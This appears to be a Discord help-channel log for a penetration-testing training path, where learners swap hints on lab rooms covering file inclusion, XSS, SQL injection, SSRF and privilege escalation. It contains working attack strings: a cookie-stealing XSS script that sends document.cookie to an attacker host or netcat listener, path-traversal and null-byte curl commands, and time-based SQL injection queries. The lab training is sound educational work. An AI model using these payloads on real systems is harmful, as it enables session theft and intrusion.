#junior-pentester-path
Q On Local File Inclusion 2:
Why does entering ../ 4 times in the query result in an error message showing 5 ../?
Local File Inclusion 2 Lab 3:
Looks like there is a bug in THM since it accepts the wrong answer. Even if you missed the ||%00|| at the end, you are right.
Where are you stuck?
Stuck on flag3, I'm trying to get through it but can't. Any help is kindly appreciated.
@queen marsh flag 3 of which section / task?
File Inclusion Last task Q3
Why are you stuck? What are you running into?
typically if you get a timeout, you need to restart the vulnerable machine
I am also stuck on the same task @queen marsh
File Inclusion > Task 8 Challenge > Flag3
the hint is "[Hint#1] Not everything is filtered! [Hint #2] The website uses $_REQUESTS to accept HTTP requests. Do research to understand it and what it accepts!"
did you find something?
I started a python server locally and downloaded the cve there but when I use wget on the vulnerable machine to get it, it says connection refused
Anyone help me out?
Not yet
database name also?
What's the full command you use with wget, so the URL you request?
Are you hosting that file on the attackbox or your own machine?
But if it's not only a typo in discord, you have to use it like wget http://machine_ip:port/cve
The file is on my local machine
So is the slash between machine_ip and :port only a discord typo or you entered it like that?
I used a colon, where did I show a slash?
Well in the discord message up there it shows /:port. So are you connected to the thm vpn with your local machine?
Yeah I am
Use the techniques you used in both challenge 1 and 2.
Task 4 curl 2 requests: the curl command is properly typed in, but I can't get the green popup to say that the password reset email was sent to attacker@hacker.com
there should be a terminate button in the lesson
Hi guys! I have just finished the Vulnerability Capstone room. But I am wondering about the last question. How did you guys get the flag? I saw that burp should be used. I changed my IP address but when I tried to execute the script I was getting errors related to the code, such as a syntax error. So after many changes to the script I was able to get the flag through the CLI. I didn't catch any request with Burp. So, did you pass the room like me?
Anyone else having an issue of the SSRF room's final task (SSRF Practical) not actually showing you can update your avatar?
You can either get a reverse shell and look for the flag, or have the exploit return the value of the flag, depending on the script you used
@tall rain I just updated my avatar. did you create an account and then navigate to /new-account-page ?
Hm.... so weird. Yeah, clicked the link, tried changing the URI manually. I'll try to reset the box. Thank you!
I changed the url manually and it worked for me
Yeah I tried with reverse shell. But it wasn't successful...
Hi! I couldn't pass the LFI PHP filter examples in lab 5. Somebody help me please
what have you tried so far?
I tried the subject example: lab5.php?file=....//....//....//etc/passwd
but still gives me error
like:
Warning: include(includes/../../../etc/passwd) [function.include]: failed to open stream: No such file or directory in /var/www/html/lab5.php on line 28
Warning: include() [function.include]: Failed opening 'includes/../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php5.2/lib/php') in /var/www/html/lab5.php on line 28
You'd be surprised
@sharp yoke review what you entered in.
exactly where ? :/
review the file=....//....//....//etc/passwd section
Yeah, I'm stuck there exactly :D
okay
So how many traversals does that message indicate you have to do? /var/www/html/lab5.php on line 28
3
No
oops /. ...
4 ?
Try it
not gonna lie, i went down the wrong rabbit hole, what you provided us had spaces after the //
didn't even think about the number of traversals lol.
Yeah, me too
I try this btw
that was just me hinting at the spaces in your file= line
:p
Hi.
In the auth bypass room logic flaw challenge, how do I create an email for myself?
@hollow zephyr when you create your account and it asks for email, use your username@customer.acmeitsupport.thm
you don't need a functional email, but using that will allow tickets to be sent to your accounts ticket inbox
@brazen notch Thank you so much. That worked.
Gave +1 Rep to @brazen notch
I'm completing the Protocols and Servers room. It has a task to retrieve a flag by connecting to telnet. I tried various ways but I'm getting a bad request error
how exactly do we need to frame a request
@analog quartz did you add host: telnet
after the GET request?
I don't see it in your screen
ahhhhhh yesssss
thank you
yw
hi could someone please give me a hint as to why this is happening? Metasploit: Meterpreter last question
Anyone got any good stuff from the tickets?
Good = Vouchers, Pineapple, Premium month
knowledge, i gained knowledge..... thats about it
knowledge is one of the most profitable and important resources that is out there
Did you give the machine enough time to fully boot up before trying to run that?
i did
it's been running 20 minutes
Do you have a LHOST option for that one? As 10.0.2.15 doesn't seem to be a valid VPN IP, so for your own machine.
On WinPrivEsc, is the dllsvc service missing? Task 5
Hello. I am stuck on challenge 3 of the File Inclusion room. Any help?
what tool did you use for I think task 2
Is this path enough for eJPT?
are you asking me?
yes sorry
Can I get some help with Task 8 in XSS? The blind-xss practice?
I set up a nc listener using the following: rlwrap nc -lvnp 443, and used the payload described in the lesson, but I'm not getting any data.
think outside the box, and by box I mean browser
I am already on burp XD
I am checking different payloads from github
no luck
because numbers and symbols are filtered
what about a tool from the terminal?
trust me I know exactly where you are
I was stuck there for like an hour
you want me to use curl?
I'm trying to hint you to it without saying it
bumping this.
But the filters will filter even on curl
I completed whole introduction to web hacking module except this XD
and playground
did you research the $_REQUEST?
well it uses GET, POST and HTTP headers
what kind of request are you sending with curl?
simple curl request
so simple uses GET, maybe try another way
I had no issue when I used the example of just "nc -nlvp 9001"
ok let me see
</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script> is the attacker IP supposed to be like x.x.x.x:443/?cookie or x.x.x.x:443?cookie
I tried both and had no results.
I did it with
</textarea><script>fetch('http://x.x.x.x:9001?cookie=' + btoa(document.cookie) );</script>
okay so the / is needed, but that's not in the lesson, probably a typo.
but i've tried both ways and it's still not giving me anything
okay.
Well, now this is interesting.... Dev tools outputs the cookie, but I don't receive it in my NC listener
Thank you!
Gave +1 Rep to @night hearth
@night hearth I've tested and made sure that I'm receiving connections by accessing the ip:port combo in the browser. But, when I submit the ticket with the payload, and open the ticket for the payload to execute, I do not receive any response.
i got one and the playground RCE
I'm stuck on LFI Task 8
haven't found 2 and haven't tried 3
the playground RCE was the easiest for me, I'm struggling on the challenges as well
@sharp yoke @wet gulch for task 2 when using curl, you need to look at the cookies.
I don't think I even had to open the ticket. As soon as I sent the request I received the cookie in netcat
interesting.
look at the curl output after you set the cookie
yes I know challenge 2 requires cookies, the problem is I've tried 100 different cookies to try to get the file and I'm failing
i have seen the admin page and can get that
do you see something that resembles the lessons information like includes/Admin.php
exactly where im at
yeah me too
I've tried curl, burp, it's all the same, just can't figure out the syntax to get the file
i tried includes/../../../etc/flag2 but it didn't work
or just ../../../ or ..../..../..../
i tried url encoding
does the input expect a file type?
there is no input in Task2
one second, let me load up that box again.
Do you complete task 1 ?
I've basically tried brute forcing the cookies but I can't seem to find which cookie retrieves the file
Yes
Just stuck on task 8 flag 2 and 3
linux privesc last challenge where the hell is flag1.txt??
You got me here...
you too stuck there?
No, I just barely started the course. I've done a few other pen testing things but I'm taking this course right now, only on file inclusion
oh okay
anyone?
Okay I'll wait for you thanks
Gave +1 Rep to @brazen notch
Did you need help on task 1?
yeah I'm stuck everywhere
@wet gulch @sharp yoke okay, i just redid challenge 2, when you curl the page, setting your cookie to something other than guest, you should see an error output
Yes
copy paste the "failed opening ....." error here
Yes
copy paste the error message
It says includes/Admin.php
exactly
I'm away from my PC for 2 sec
I don't understand these file paths in the file inclusion section
if you put in --cookie "THM=shark" the output will be includes/shark.php
that means it's expecting the .php filetype.
%00
nope
Lol I understand everything but how you get it to a cookie but this helps
did you use curl to modify your cookie?
I was not going to ask and wanted to solve this myself but the commands seems correct on the "Authentication Bypass" to get the username/password for the answer but the output shows me nothing. Am I missing a step or.. ?
I don't understand the "--" thing
curl "http://MACHINE_IP/challenges/chall2.php" -b "THM=admin; cs_lang=../../../etc/flag2%00"
its an option you add to the curl statement
type curl --manual into your terminal
yeah, you're overthinking it a bit :p
Gave +1 Rep to @brazen notch
np, if you want more help i can try, i'm trying to avoid just giving you the answer
I'm close
no thats fine
my reading comprehension sucks honestly, so I don't get everything but I get most
when I first went through it, I realized I had to use the --output - flag at the end of my curl statement
I get error 502 -_-
when you start using the %00 yes, you'll need the --output -
output to file
that too
@night hearth I'm still lost about why I can't get the cookie in my nc listener lol
you still got the flag didnt you?
well, I had to look at error output in my dev tools
oh so you just want to go back and do it the correct way
yea
You should cross check your wordlist location
so replacing the {URL_OR_IP} with your attackbox IP and nc listener port just isnt working?
Correct.
OK but now I got disconnected, and still 50+ min left. Trying to get back on but it won't let me.
why cs_lang ?
</textarea><script>fetch('http://x.x.x.x:9001?cookie=' + btoa(document.cookie) );</script> @night hearth
Try reconnect
curl "http://MACHINE_IP/challenges/chall2.php" -b "THM=../../../etc/flag2%00;" --output /home/kali/Downloads/lfiflag2.txt @brazen notch I'm still not getting the file
@wet gulch you're close, it's expecting a filetype.
Tried 3x so far. Nothing.
NC might not work! Try attackbox
I'm stuck on task 1
please help
in the cookie or as a curl option?
in the cookie.
Terminate your machine and connect again
was that a copy/paste? it should be btoa(
err yea it's btoa wasn't copy paste
I typed it out from the inspect element portion
Which room?
You can share your problem here
how can I send a file parameter with a POST request?
@sharp yoke with curl.
Yes
curl -X POST -d 'data' 'target'
you can also use devtools or burp
I tried devtools but I couldn't send a file
How do you try?
@sharp yoke have you looked through https://tryhackme.com/room/webfundamentals
@steel nymph my friend
at the beginning of task 8 it says familiarizing yourself with HTTP Web Basics will help you complete the challenges.
I open the Network section, right click and click Edit and Resend
yeap
check this then : https://www.w3schools.com/tags/ref_httpmethods.asp
you add the file type after the nullbyte? @brazen notch
Y
There is another way to change page source and resend from dev tool
Failed again... I'll just clear cookies/cache, and go from there.
number of traversals :p
devtools sucks, or I couldn't do it with it
Dev tool is a great place to start and learn
Didn't work... after clearing cookies and cache, nothing.... is there a problem on the site's VMs Attack Machine or... ?
I'm stuck on Burp Repeater Task 7...
I can't get a 500 response, I just keep getting 404s
If you open the ticket manually, are you getting your own session cookie? Oh nvm, you are not at that room
What are you facing exactly. Can you show us?
Try read the hints carefully
Are you trying to open attackbox or vm?
I did. I have tried text, large numbers, 0, symbols, and combinations of all of them.
Or you can't access thm at all?
Did you read the hints?
yea the hint is "The idea here is to enter unexpected inputs to see how the server will react. For example, instead of a number you could enter a piece of text, or a symbol. Alternatively, you could try entering a number greater than the number of products available (e.g. 1000), or a number less than or equal to 0."
Read aloud to yourself
Got it?
trying to open the attackbox.... nothing is working... it's because ffuf and other things are installed there that aren't ready on my own Kali. Maybe I should set it up.
no I have tried all of that, I feel like I am doing something wrong here
Are you using any kind of vpn?
curl -X POST --cookie "THM=Admin" http://10.10.176.3/challenges/chall2.php -H "Content-Type: multipart/form-data" -F "file=includes/../../../../etc/flag2" didn't work
that's because what you entered is incorrect.
Read aloud the last line of the hints
where exactly ?
remove everything at the end, and look at the response you get
You should mark it as spoiler when you post any kind of solution here
well it was the wrong answer so I didnt think it would be a spoiler
thanks. I think I have done one too many modules today
Gave +1 Rep to @viral token
Less than 0 might not always be minus
I could have sworn that I had tried that already, but apparently not
more specifically remove everything from -H onward.
Nope you did not. Take a break.... It will come to you easily
yea I got it when I said nvm. as soon as I looked at what I posted
You should hit the exact URL; <0 is not a valid URL
Do you want to see the spoiler? Or you want to solve your self?
no I solved it lol
Good
easy question guys!!! On meterpreter, I use pwd and see I am in C:\Windows\system32...... how can I go back? Need to move to C:\Program files (x86)
which command should i use
cd.. doesn't work, and neither does cd C\Program files (x86)
It will work if you do it correctly
hate to be a newbie :DDD
holy shit!!! it was the fucking slash.... seriously???
lol
ty ninja
I really really recommend googling before asking
I'm still stuck on this blind-xss challenge.... the page is throwing a network error when I'm trying to point it to my NC listener, but I validated it can receive connections via my browser... can anyone help me figure this out?
oh, my god, nevermind >.<
SSL was preventing the connection.
were you putting https:// in your attack?
no
but the lesson said to visit the vulnerable site at https://vulnerablesite.thm.com/customers/
it doesn't work with SSL anyway.
i guess it was probably an oversight by the creator of the lesson?
if SSL is on, CORS policy blocks the transmission of the cookie to the NC listener.
Is there a way to overcome that?
Having issues with Blind SQLi - Time Based challenge. I have found a table and determined the column names of the table but am unable to run the query to get the values from the table.
What you got? Send with spoiler tag
Nope. Not connect on VPN.
No worries. I'll try later after I have some grub.
Did you try restart your machine and/or network?
That's my next step... I was talking to my colleague on a project. Didn't restart yet.
Try with vpn/proxy then
The table I found was ||analytics_referrers|| and i found it to have || 2 columns id & domain ||
With this info I changed the query to end with || UNION SELECT SLEEP(5),2 FROM analytics_referrers;-- || I have also tried it with || where domain like '%';-- || at the end of it but all fails.
Are you sure there are not more than one table?
I am sure there is more than 1 table. And I know this could be the wrong table I need to complete the challenge but am concerned with the fact I am unable to retrieve the information from that table to begin with
Try to get the other table and dig there
!= Do you know what it means?
@night hearth hey man, sorry to pester you again, but I actually think I am completely lost. I figured out what I was doing wrong for the nc listener, but I'm blanking... that session cookie that I'm getting is my own... do I need to use auth bypass in this module to get the staff-session cookie?
Other table was simple enough as it was predictable
|| table: users - columns: username, password, id ||
but even with this as soon as I try to run through and figure out || username || from the query everything fails
I do it the same way as the challenge before with
|| UNION SELECT sleep(5),2,3 FROM users WHERE username like 'a%';-- || but everything fails
hello
What document defines how a penetration testing engagement should be carried out?
what is the answer
Just google it... this is not hard and an important step for penetration testing.
Is anyone around to help with XSSGI Task 8?
I've confirmed my payload works and sends my own session cookie to myself over netcat if I open up the ticket, but it's as if the automated staff session isn't opening the ticket for me to get the staff-session cookie.
Try restarting the target machine and do it again, it's a bit buggy. Maybe giving the target machine 5 mins to fully boot before creating the ticket helps, but not sure.
@shadow echo yeah... i've been stuck on this for 2 hours, i just restarted the machine about 15 minutes ago, went through the entire module again before trying the payload..... I'll give it another shot.
Have you tried it with the request catcher or on the attackbox (in case you are not already on the attackbox) already?
@brazen notch I just ran through it again and everything worked fine
does the name of the support ticket matter?
the payload goes in subject
No the payload doesn't belong into the subject field, that will lead to getting your own session cookie immediately.
? I just did it in subject and when I decoded the cookie I got the staff session cookie that the task accepts as correct
Well I don't know, maybe you were lucky that whatever triggers the ticket to be read as staff was faster. But as the subject of the ticket is displayed in the ticket overview, the payload gets executed as soon as you get redirected to that ticket overview page. I was already helping someone who did exactly that and he was wondering why he always got his own session cookie.
Before restarting the machine, are you always checking if it's working if you click on the ticket?
yeah, my current payload is
||</textarea><script>fetch('44715acd542996ee53c87fb7dafbf148.log.tryhackme.tech?=cookie' + btoa(document.cookie));</script>||
wait a sec
-_-
fixed it -_-
i got it working with the request catcher, but can't get it working with my nc listener.
Hey, anyone around to help me with the LFI challenge lab? I am doing #1 and I can't really work out what I am doing wrong. It's probably something stupid but it's driving me up the wall
So I'm currently using burp repeater to edit and resend the post request
hm, I didn't use burp as I'm not too familiar with the tool yet. Are you familiar with curl?
Not as much but I have used it a few times in the past, give me a sec and I'll see how that goes
whichever tool you're looking at using, make sure that you're using the right HTTP request
GET vs POST
I am definitely using post requests but I think I might be messing up in someway of the format of the request/query. Curl may make it a bit simpler though
what does your current request look like
Am I allowed to post screenshots in here of this or is it best to dm?
you can dm me
!docs verify
After that you can post screenshots
Got it now! thanks @brazen notch . I was being dumb with my burp request formatting lol
Gave +1 Rep to @brazen notch
Awesome!
Just a question about the Command Injection lesson... I can get the different commands to work and gather data about the system, but would it be possible to establish a reverse shell via this vulnerability? I don't see anything that would do that on the payloads github it provides. I've been fiddling around with using nc to connect back to my listener for experimentation and sometimes I get the connection established but it's a dead shell. Other times it doesn't connect.
I also tried setting up a bind shell, which doesn't work either.
aww man
Authentication Bypass Task 4, how do you do curl request 2 to get it to say "we'll send you a reset email to attacker@hacker.com"? Because it's not saying that for me
File inclusion, task 4: I have done everything to get the answer but nothing seems to work. Anyone help?
@pallid mist check your address bar and tinker with it
Command injection task 5. Which one of the thousand payloads would I run hmmmm
https://media.tenor.com/images/9e1debd82db1bb8099adba54e136bf33/tenor.gif
I have a question. When it comes to LFI, why is it like this =../../../../etc/passwd and not just like this =../etc/passwd? What's the point of so many ../../../../?
Because you need to move up to the root directory of the machine
The directory you start in is /var/www/html
If you do ../etc/passwd
You're doing
/var/www/etc/passwd
You need to do one ../ for every directory you want to move up
Whatcha mean?
derp...
ty I'll remove my posts lmfao
ah shit
its still in bug report
thank you! @modest arch
Gave +1 Rep to @tulip elm
I had it in the wrong room, anyways.
If you are putting in a key for the SQL room, make sure you move to the next stage first. Otherwise you are entering your key for the previous question.
Kinda silly mistake, I made it, sure I won't be the last. If you are having the same issue, hopefully you see this post xD
Anyone here able to solve LFI challenge 1?
I'm using burp to send a POST request
With file=../../../../etc/flag1
But it doesn't seem to work
I feel like I'm on the right track or am grossly overlooking some detail in the code
@chrome sand I just got done with challenge 1-3. I don't want to give anything away so lets start with a question: How are you sure you need to go back 4 directories?
and sorry are you talking about the challenge 1 or Lab 1?
so the error it throws me is telling me that I'm in /var/www/html/chall1.php
so to hop out, that is 4 directories, no? or am I seeing this wrong
challenge 1
by this this is still Spartello
had a different account on another device lol
It says "The input form is broken!" when I try to burp it or click the "include" button I don't get errors. So for me, I never got any errors to tell me where I was located.
I was able to get the flag by using a CLI tool and not through burpsuite.
ah okay, makes sense. I'm a little more familiar with Burp so was comfortable using the repeater tool
but I guess I'm doing something wrong
it's throwing an error so I guess I'm somewhat on the right path
but super lost on the directories now
If you need a bit more of a hint as to what tool you can use, check out the HTTP Web Basics link and brush up on POST requests
Yeah I actually did that earlier too haha
so it was using the curl command
maybe I'll give that a shot
also the number of DIRs you need to move is in the error line ||(include_path='.:/usr/lib/php5.2/lib/php')|| not the /var directories
on a Linux server it's the usual location, var/www/html
am I right @zealous marsh ?
which tools are you using?
I'm checking something @viral token I might be wrong about something. I'm doing some testing to be sure
oh, okay
Okay yeah I was right. Did you check my post about the error line? The directory you need to move is from the ||include_path|| string. If your base is off the /var/www/html dir you won't move back enough to get back to root.
||challenges>html>www>var>root>etc = ../../../../etc|| @zealous marsh
hmm see from my understanding of the reading Task 4 it was because the include function is calling from a different directory.
aye
oh so it's like "cd .."
I am doing burpsuite the basics room and stuck in Task 9
Read through the options in the right-click menu.
There is one particularly useful option that allows you to intercept and modify the response to your request.
What is this option?
which option and which submenu is he talking about exactly?
I believe it's referring to the send to repeater option @empty forge
I haven't gotten that far yet though so I could be wrong.
no it is not right
Possibly Proxy>Intercept then? Other than that idk. I'd have to get to that room and task to know to be sure but I'm about to hop off for the night. Maybe someone else here can help.
hey I am doing the Linux PrivEsc room in the Jr. Pentester path but the machine is not connecting via the given credentials through ssh
anyone know what's the issue?
I think you should check your vpn
it's working fine, as you can check from the ping command in the pic
Try using the web browser attack box and see if you have the same issue.
It's about intercepting the response I think
File Inclusion > Task 8 > Challenge 4
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
What?
Am I supposed to launch my own server to host a text file with a command or something?
A bit like that. Have you read up about RFI?
Only the bit in Task 6
Which is...
Overly simplified and barebones
RFI is just like LFI, except instead of a local file it's a remote file
So instead of ../../../../something.php etc, you might specify http://attacker/GiveMeShell.php
So that last sentence is halfway there
Whoever said use burp, I didn't use burp for any of these tasks, so no you don't have to
Nevermind, I was thinking about lab3 not playground.
Yes in playground you have to use a file stored somewhere else
Didn't use burp for that either
Burp is just the shortcut tool you're not supposed to know how to use yet. Everything so far has been doable in browser. That's why I'm so confused with this.
Other protocols are available
I did not use burp either. You have to create a php file
How did you manage to do it without burp (or any other software)?
Yep task 3. I thought you did it by simply inputting the URL
Command injection task 5. Which one of the thousand payloads would I run? I'm a grandpa. Hehe
Check the TXT records of thmlabs.com. What is the flag there?
I am trying nslookup but thmlabs.com does not exist
I am doing passive recon room
Well, check task 3 to see which shell operators the site may react to.
Can anyone help me?
What's the full command you try? As it works just fine for me
That works just fine for me, what's the reply you get with that command?
Copy paste the full reply pls or send a screenshot
It worked suddenly XD
Uhm, okay ^^
Anyone with hints on challenge 3 of File Inclusion? I'm kinda dry on ideas
@shadow echo thanks Fontaene going to try that
Gave +1 Rep to @shadow echo
user@AttackBox$ traceroute tryhackme.com
traceroute to tryhackme.com (172.67.69.208), 30 hops max, 60 byte packets
1 ec2-3-248-240-5.eu-west-1.compute.amazonaws.com (3.248.240.5) 2.663 ms * ec2-3-248-240-13.eu-west-1.compute.amazonaws.com (3.248.240.13) 7.468 ms
2 100.66.8.86 (100.66.8.86) 43.231 ms 100.65.21.64 (100.65.21.64) 18.886 ms 100.65.22.160 (100.65.22.160) 14.556 ms
3 * 100.66.16.176 (100.66.16.176) 8.006 ms *
4 100.66.11.34 (100.66.11.34) 17.401 ms 100.66.10.14 (100.66.10.14) 23.614 ms 100.66.19.236 (100.66.19.236) 17.524 ms
5 100.66.7.35 (100.66.7.35) 12.808 ms 100.66.6.109 (100.66.6.109) 14.791 ms *
6 100.65.14.131 (100.65.14.131) 1.026 ms 100.66.5.189 (100.66.5.189) 19.246 ms 100.66.5.243 (100.66.5.243) 19.805 ms
7 100.65.13.143 (100.65.13.143) 14.254 ms 100.95.18.131 (100.95.18.131) 0.944 ms 100.95.18.129 (100.95.18.129) 0.778 ms
8 100.95.2.143 (100.95.2.143) 0.680 ms 100.100.4.46 (100.100.4.46) 1.392 ms 100.95.18.143 (100.95.18.143) 0.878 ms
9 100.100.20.76 (100.100.20.76) 7.819 ms 100.92.11.36 (100.92.11.36) 18.669 ms 100.100.20.26 (100.100.20.26) 0.842 ms
10 100.92.11.112 (100.92.11.112) 17.852 ms * 100.92.11.158 (100.92.11.158) 16.687 ms
11 100.92.211.82 (100.92.211.82) 19.713 ms 100.92.0.126 (100.92.0.126) 18.603 ms 52.93.112.182 (52.93.112.182) 17.738 ms
12 99.83.69.207 (99.83.69.207) 17.603 ms 15.827 ms 17.351 ms
13 100.92.9.83 (100.92.9.83) 17.894 ms 100.92.79.136 (100.92.79.136) 21.250 ms 100.92.9.118 (100.92.9.118) 18.166 ms
14 172.67.69.208 (172.67.69.208) 17.976 ms 16.945 ms 100.92.9.3 (100.92.9.3) 17.709 ms
what is the IP address of the last router/hop before reaching tryhackme.com?
What would be the answer?
To my knowledge, it should be 100.92.9.118
But that's not right answer
can anyone tell me the answer with reason?
check hint and do a little research
I did lol i wouldn't be asking if i didn't XD
it's ok
I did use a POST request with the body
but as with @viral token, I have no more errors but neither do I see any flag
I used a POST request with the body of || file=../../../etc/flag3 || and a URL request with || chall3.php?welcome || and now i need to get rid of the response doing || flag3.php ||
Working
Got It
Congrats
Which room is that?
Normally it would be the 100.92.9.3
But depends if the router is replying to ICMP request
can you explain more
because here I think we are getting replies
Also 100.92.9.3 is not answer
Basically the traceroute is a malformed type of ICMP (ping) request with a TTL at 0
Check google on how traceroute is working
Sometimes you need to open it in a new tab to see the results
It worked without the need to open a new tab
Thanks
Gave +1 Rep to @viral token
The last router before reaching tryhackme will be in the last line. If you check Traceroute A's last line, you get 2 IPs, so therefore it took 2 different routes on the last hop to tryhackme, as by default traceroute will do 3 probes (IIRC). The answer will be the first IP address that responded, like the hint says.
Y'all just teasing me now.
Can someone be kind enough to give me a hint on how to get an SSH server header without a login, for the net sec room
No need, I got it, was overthinking it as usual
so lucky
I'm working on this same challenge, but every time I modify the requests in burp suite, it just times out:
All that I modified is ||changed it to post, and added the file=../../../../etc/flag3||
In the POST request you should add the parameters not in the request but in the body + should add something in the requested URL || that's a php script present on the challenge 3 website ||
I didn't use Burp Suite for that
I just needed the dev tools and modified a GET request to POST and changed some parameters
kk, ty I'll try that
Yes, it is, so what's wrong, what are you facing?
I said earlier that I'm done with this XD
oh yes, you are!
Just trying to help
Was helping me
That's good! A little help is all we need here....
I was tired around 12hrs and someone helped me too!
Now I'm stuck on SQL injection task 8 x)
Hi! I have an SSRF question. Why are we using x in the "x/../private"? I don't understand the meaning of x
okay, you can tell me where you got blocked! @flint smelt
I have 2 table names, ||analytics|| and ||users||; the problem is that I can't get the column name. I used the previous command from task 7 but I'm so shit at SQL || headache incoming || ahaha (and the database name as well)
It's clear that you need to dig table 2
And how are you trying to dig for the database name?
as well as tables.
Yeah, I tried to use || https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'my_letter%';||
I mean I have the database name from guessing and verification: since ||sqli_three|| was used, it's ||sqli_four||
As I remember there is no ||sqli_three|| on that task
Task 7 there is
yes, you should use the 2nd one, but, try to dig, not guess
And since we just replace boolean-based with time-based, I adapted the previously given commands to time-based
I guessed and verified with || https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'sqli_four%';-- ||
read this... a suggestion from a friend... this post helps me a lot
https://www.mssqltips.com/sqlservertip/5670/examples-and-function-for-using-sql-server-like-operator-and-wildcard-characters/
I just verified there is no other db
So in this db I found the 2 tables I mentioned before
||four|| is the right answer.... and the 1st table has not ended yet; if you try to find the lost part of the 1st table you will learn something. And you need to dig table 2 using db 4
Yeah I saw
I removed the %
and it appears it's not sleeping 5s
so it's not finished yet
try to find out the rest... let me know if you need spoiler...
Is % enough to complete the rest or do I need another operator?
% is enough
Ok thx 
Gave +1 Rep to @viral token
The Windows privesc room seems to be broken: the unquoted service won't start whatsoever, no matter the method used to start it, and the reverse shell will only last about 5 seconds
I found my problem, Meterpreter shells simply don't work
make sure to use the msfvenom cmd the task uses
my bad xD
So LFI task 4: I've gotten the lab to dump out etc/passwd but it won't accept my answer.. Someone give me a little help here
Never mind, it helps when you actually read what's in front of you
-f exe-service is a good trick too
hope you got it by now!
Hey guys, isn't the AttackBox for LinuxPrivSec task 7 working?
from the jr pentester path
It's just reconnecting. Fails to connect
did anyone complete the xss lab?
I'm stuck on the last part. I am listening on the port but I didn't receive anything
@steel nymph
could you help me please ?
Hi guys, I just won a 3€ voucher through the event. I don't think I should ever order anything so I'm sharing my voucher with the community^^ have fun: rDKU4KAkPh
</textarea><script>fetch('http://{URL_OR_IP}?cookie=' + btoa(document.cookie) );</script>
yes
sir @steel nymph
nc -nlvp 9001
<script>fetch('http://10.10.133.109?cookie=' + btoa(document.cookie) );</script>
no i see nothing
here
I don't see which port my website is running on?
80?
nope
Should I listen on 80?
yeah finished the room now lol
going to start SSRF after dinner
Hey, what should I do? I completed all the free rooms in the jr pentester path but I haven't got a free premium voucher
:(
How can I send?
It's time to subscribe
@sharp yoke I think you need to visit google, or revisit the HTTP Web Basics, no offense sir.
Hey everyone, I am working on the file inclusion lab and on task 8 (Challenge) and Flag3.
I am stumped on what to do here. I've tried specifying the $_REQUEST in a POST message and messed around with the filters. I constantly get "Failed opening '.php'" message.
I am not sure what I am doing wrong here and was hoping for a hint. I've read through some of the other comments but no luck.
Look to implement both techniques you used in challenge 1 and 2 as well.
Ah, that got it. I don't understand how I missed this....
I've still got a question from this that I don't understand. How would you be able to identify the system requires a POST vs GET command in order to exploit the file inclusion?
Is it really just trial and error or are there certain things you would look out for?
any hints for challenge3 in file inclusion?
Capture Flag3 at /etc/flag3?
yes
look above ^
Yeah, it's adding .php at the end and we have to use the null byte to bypass it, but what about the filter? Because it is removing all special characters and numbers
There is a way around the filter. There is also more than 1 type of HTTP request
Did you figure it out?
on the SQLi Task 8 - time based, I keep getting errors after finding the table name by trying to find column_name
I know _ can be a wildcard character, but it's also a valid character in table names
is that messing me up somehow?
I also have the table name
idk how to spoiler it
thanks
I have the table_name as ||users||
|| select * from analytics_referrers where domain='admin123' UNION SELECT SLEEP(1),2 from information_schema.tables where table_schema = 'sqli_four' and table_name = 'users' and like '%'; --' LIMIT 1 ||
this works
|| select * from analytics_referrers where domain='admin123' UNION SELECT SLEEP(1),2 from information_schema.tables where table_schema = 'sqli_four' and table_name = 'users' and column_name like '%';--' LIMIT 1 || this is throwing an error
unkown column 'column_name''
head, meet desk
this is why, after multiple semesters of database stuff, I gave up on ever wanting to work as a dba or dbe
that's a carry-in from the server-side
I posted the SQL query box
nah, you're good.
some old guy in the 60's didn't like file hierarchies and here I am, learning SQLi
I'm on SSRF task 2 trying to get the flag and the URL I currently have is https://website.thm/item/2?server=api.website.thm/flag&x=&id=9. I'm getting a 504 so I know I'm close; I tried changing a few things and I get a 404 or still a 504
Hey guys, I am on the Linux privesc task where I gain root shell access on a reverse shell through a cronjob. However, once the script executes and I get a connection on the reverse shell (attacking machine), it connects as the unprivileged user (karen) instead of root. Can you help me out as to why this happens?
I believe that is what is supposed to happen and you have to continue to escalate
I'm not there nor do I know the answer, I just have seen it talked about in this chat
Oh. I still doubt it tho. I'll just wait for someone to answer. Thanks!
I'll see if I can find it, I think someone asked the same question
Yeah I too found in the chat where @steel nymph shared his insights there.
here
I think running the script manually is not expected. Probably let it run for a while and see if things turn out to be good
ahhh yess. it worked
I almost specifically remember someone saying something about user karen not having privileges in privesc and the response was "that's supposed to happen"
yeah. I changed the privileges. The task expects us to let the cronjob do its task on its own and not do it manually
but thanks! @wet gulch
Gave +1 Rep to @wet gulch
yep yep. seems like a lot of em struggled here
I probably will too
I am having issues on the Msfvenom (Task6) of Metasploit Exploitation
You're always helpful someway or the other mate! Thanks @steel nymph
Gave +1 Rep to @steel nymph
I have a meterpreter session, but ||use post/linux/gather/hashdump|| is failing
I am getting ||Failed to load extension: i486-linux-musl/post/linux/gather/hashdump not found|| as an error
Okay I'm dumb, I see the format is different. Can I get another hint? @steel nymph
Right, so on Linux priv esc task 7 the task says we should use nano as it has ||the s bit set||, tho on my VM it doesn't... literally can't do the steps as they are laid out without nano, or am I looking at this wrong
ah okay
Off to GTFOBins I go then
I still have 60 percent to go. Almost done with web hacking as a complete noobie
Hey guys
In the Protocols and severs 2
For TLS
Task 4
Where they ask what the 3-letter acronym of the DNS protocol that uses TLS is
I can't find the answer anywhere
Did you check the hint? It says you have to look it up.
Found it
Thanks
How do you send hidden spoiler from phone?
Ok
So
I'm writing
||scp book.txt mark@10.10.10.203:/home/mark||
Not working tho
It says book not found
That's what they have in the example above
Weird
Ah wait
Yeah my bad
I'm reading too quickly lol
Got it
Hey guys, I'm working on the Linux PrivEsc, specifically the section on crontab. I have both files set to run the reverse shell but nothing is connecting back to my netcat listener. Is there something I'm missing?
I'm sorry, I'm not exactly sure what you mean by that
Do you have to manually run the crontabs?
* * * * * means that the crontab should run every minute right?
I tried running crontab antivirus.sh and received an error stating "antivirus.sh":2: bad minute
Am I on the right track?
The crontab service may not be running. I tried ps and I didn't see the process there
Should I just do this task on the attack box instead?
So, you can run the script separate from the cronjob running it?
Permission denied
should I chmod first?
Did you find the file where you have write permissions?
